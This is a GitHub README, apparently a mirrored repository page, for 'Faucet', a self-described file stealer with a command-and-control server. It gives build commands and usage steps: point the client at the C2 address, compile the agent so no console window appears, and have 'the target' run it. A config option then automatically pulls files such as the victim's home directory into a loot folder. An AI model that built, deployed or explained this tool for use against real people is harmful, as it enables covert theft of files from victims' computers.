R00tendo / Faucet

Easy to use encrypted cross platform GUI file stealer.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Easy to use encrypted cross platform file stealer with an interactive GUI. Yeah that summarizes it pretty well.

Feel free to contribute.

Server Installation

Precompiled:

Go to releases, download the executable and run it.

Compile yourself:

git clone https://github.com/R00tendo/Faucet
cd Faucet/server
go install github.com/wailsapp/wails/v2/cmd/wails@latest
~/go/bin/wails doctor
  1. Install any missing dependencies.
~/go/bin/wails build
cp build/bin/* ./

Usage

  1. Open global.conf and change the password.
  2. Start server.
  3. Modify client/main.go and change the C2 server address and password variables to the correct ones.
  4. Build the agent: go build client/main.go (if you don't want the terminal to pop up: go build --ldflags -H=windowsgui client/main.go).
  5. When the target runs the agent it should now connect to the server and display the current directory's contents.

Global.conf settings

  • password: Password used to encrypt the traffic.
  • listen: Server listener. Format: <host>:<port>.
  • lootdir: Where Faucet will store downloaded files.
  • autodownload: A file/directory to be download the second the agent connects. NOTE: %user% will be translated to the home directory.

I don't really want skids using this so you have to have enough knowledge to figure out the rest yourself kek

About

Easy to use encrypted cross platform GUI file stealer.

License:GNU General Public License v3.0


Languages

Language:CSS 89.2%Language:Go 5.4%Language:JavaScript 4.7%Language:SCSS 0.6%Language:HTML 0.1%